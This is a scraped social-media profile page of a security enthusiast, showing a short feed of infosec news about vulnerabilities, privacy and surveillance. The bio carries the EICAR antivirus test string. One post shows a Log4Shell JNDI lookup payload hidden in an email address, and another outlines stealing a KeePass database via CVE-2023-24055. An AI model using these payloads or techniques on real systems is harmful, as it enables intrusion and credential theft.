Infosec @ random
@infosecatrandom
Tor operator, privacy advocate, security geek. Also: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
You might like
Just a month later and... 🇪🇺 ChatControl is back! Now they're trying to pass an even more far reaching ChatControl law through the back door, in a form even more intrusive than the originally rejected plan, without needing any of the EU countries votes The new proposal: -…
Read our latest crazy story on the spy who was so successful at pretending he's someone else that the GRU "killed off" his real persona and stranded him with the fake one. Once a fake environmental expert, now he's part of the Russia disinformation machine theins.ru/en/inv/286477
💥 Wiz Research has uncovered a critical Redis vulnerability that's been hiding for 13 years We found RediShell (CVE-2025-49844): an RCE bug in Redis that affects every version of Redis out there. It's rated CVSS 10 - the highest severity possible. The vulnerability lets…
Until now, if you lost or broke your phone, your Signal message history was *gone,* a real challenge for everyone whose most important conversations happen in Signal. So, with careful design and development, we’re rolling out opt-in secure backups. signal.org/blog/introduci……
TIL that some ipcams that can be found on shodan allow scanning for wifi access points without authentication ....
Russia’s Most Secretive FSB’s Spy Network Unmasked by Souvenir Badges Sold Online — UNITED24 Media united24media.com/latest-news/ru…
I've discovered via code review: 2 zero-click RCE logic bugs in Linux kernel Bluetooth & userspace (late 2024). Exploitable to register rogue HID w/o auth. One allows bonding w/o confirmation, bypassing CVE-2023-45866 @marcnewlin patch. Details: ubuntu.com/security/CVE-2…
Run a Linux virtual machine in your browser,no server needed
🧵 THREAD: A federal whistleblower just dropped one of the most disturbing cybersecurity disclosures I’ve ever read. He's saying DOGE came in, data went out, and Russians started attempting logins with new valid DOGE passwords Media's coverage wasn't detailed enough so I dug…
The ESP32 “backdoor” mentioned in the article from Bleepingcomputer is another Nothingburger. Rob is correct.
Microsoft just released an impressive tool OmniParser V2 can turn any LLM into an agent capable of using a computer 🔥 You can enable GPT-4o, DeepSeek R1, Sonnet 3.5, Qwen... to understand what's on your screen and take actions. 100% free & open source
This has been one of my favorites for a while, but now it's time to let it go. Here's my preferred way of getting the KeePass db that we often hunt for: downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.…
This is awesome: wrap @cloudflare around your site & they can now automatically hit @haveibeenpwned's Pwned Passwords during a login attempt, check it against our DB (among others) and pass a request header to the origin if the password has been breached blog.cloudflare.com/a-safer-intern…
#GSM security: A5/4 was approved by 3GPP together with A5/3 (2009), but most vendors were lazy to change from 64 to 128bit keys on both UE and network side. A5/2 and A5/1 lessons were not enough to prevent history repeating: iacr.org/cryptodb/data/… iacr.org/submit/files/s…
🚀 Introducing getpiped.py: Your ultimate tool for testing curl/wget piping scenarios! 🌐💻 🔍 Explore a variety of script execution methods: curl/wget | bash 📜🔧 Process substitution 🔄 Here-strings 📥 Temporary files 📝 Base64 encoding 🔑 Compressed data 📦 Run…
For educational purposes only: test+(${jndi:ldap://test/a})@gmail.com is a valid RFC822 Email Address 😅
Stop what you're doing and read this. This leak is going to be the story of the year: (LINK: theguardian.com/world/2021/jul…)
United States Trends
- 1. South Carolina 27.9K posts
- 2. Texas A&M 26.8K posts
- 3. Shane Beamer 3,697 posts
- 4. Ryan Williams 1,165 posts
- 5. Michigan 44K posts
- 6. Sellers 13.7K posts
- 7. Northwestern 7,182 posts
- 8. Marcel Reed 4,673 posts
- 9. Ty Simpson 1,546 posts
- 10. Heisman 6,917 posts
- 11. #GoBlue 3,803 posts
- 12. Sherrone Moore 1,015 posts
- 13. Bryce Underwood 1,402 posts
- 14. Mateer 1,200 posts
- 15. Oklahoma 18K posts
- 16. College Station 2,924 posts
- 17. Nyck Harbor 3,329 posts
- 18. Andrew Marsh N/A
- 19. #GigEm 2,126 posts
- 20. Semaj Morgan N/A
Something went wrong.
Something went wrong.